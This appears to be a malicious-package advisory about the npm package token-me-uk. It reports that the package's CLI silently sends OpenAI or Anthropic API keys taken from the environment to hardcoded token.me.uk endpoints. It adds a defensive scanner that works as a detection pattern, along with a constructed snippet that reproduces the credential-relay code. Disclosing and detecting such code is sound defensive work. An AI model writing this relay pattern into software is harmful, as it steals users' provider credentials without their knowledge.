MAL-2026-4819
Malicious code in token-me-uk (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2a058b653e7a491fdf0c9128b4d2d408c2cdac6a1784adc5f02a0975a0e669eb)

The CLI in cli.mjs reads its API key from process.env.TOKEN_ME_UK_API_KEY, falling back to process.env.OPENAI_API_KEY and then process.env.ANTHROPIC_API_KEY (cli.mjs:7), and sends whichever value is found as a Bearer token in Authorization headers (cli.mjs:62) to hardcoded endpoints at https://www.token.me.uk/v1/dashboard/billing/subscription and /v1/dashboard/billing/usage. The package's README advertises only a Token.Me.Uk balance/usage checker and does not disclose that OpenAI or Anthropic provider keys present in the user's environment will be transmitted to a third-party domain. Any user invoking the CLI with these environment variables set silently delivers their provider credentials to token.me.uk, where they can be logged or abused. This matches the silent-relay pattern: caller-supplied secrets are routed through an undisclosed hardcoded destination controlled by the package author.
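The silent-relay pattern described above can be screened for before a package is installed or run. The following is an added example, not code from the package or from Amazon Inspector: a heuristic Node.js scanner that flags source files which read a known provider key from the environment and send an Authorization header to a hardcoded host other than that provider's own API. The provider-to-host table and the sample source are constructed for the demonstration.

```javascript
// Added example: heuristic scanner for the silent-relay pattern (not the package's code).
// A file is flagged when it reads a provider API key from process.env AND contains an
// Authorization header AND hardcodes a URL whose host is not the provider's own API host.
// PROVIDER_KEYS is a constructed allow-list for the demo; extend it for other providers.
const PROVIDER_KEYS = {
  OPENAI_API_KEY: ["api.openai.com"],
  ANTHROPIC_API_KEY: ["api.anthropic.com"],
};

const ENV_RE = /process\.env\.([A-Z0-9_]+)/g;   // env var reads
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;    // hardcoded URL hosts
const AUTH_RE = /Authorization/;                // header that carries bearer tokens

// Returns one finding per provider key that may be relayed to a foreign host.
function scanSource(src) {
  const envVars = new Set();
  for (const m of src.matchAll(ENV_RE)) envVars.add(m[1]);
  const hosts = new Set();
  for (const m of src.matchAll(URL_RE)) hosts.add(m[1].toLowerCase());

  const findings = [];
  for (const v of envVars) {
    const expected = PROVIDER_KEYS[v];
    if (!expected) continue;                     // not a provider key we track
    const foreign = [...hosts].filter((h) => !expected.includes(h));
    if (foreign.length > 0 && AUTH_RE.test(src)) {
      findings.push({ envVar: v, foreignHosts: foreign });
    }
  }
  return findings;
}

// Constructed sample mimicking the fallback chain and billing endpoint named in the
// advisory; it is a string that is scanned, never executed, and is not the real cli.mjs.
const SAMPLE = `
const key = process.env.TOKEN_ME_UK_API_KEY || process.env.OPENAI_API_KEY || process.env.ANTHROPIC_API_KEY;
const r = await fetch("https://www.token.me.uk/v1/dashboard/billing/usage", {
  headers: { Authorization: "Bearer " + key },
});
`;

// Constructed clean sample: the key only goes to the provider's own host, so no finding.
const CLEAN = `fetch("https://api.openai.com/v1/models", { headers: { Authorization: "Bearer " + process.env.OPENAI_API_KEY } });`;

console.log(scanSource(SAMPLE));  // two findings, one per provider key, host www.token.me.uk
console.log(scanSource(CLEAN));   // []
```

This is a string-level heuristic: it will miss keys read indirectly (for example through a config loader or obfuscated names) and hosts assembled at runtime, so treat a clean result as "no obvious relay", not as a clearance.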
Affected packages
No fixed version published yet for token-me-uk (npm). Pin to a known-safe version or switch to an alternative.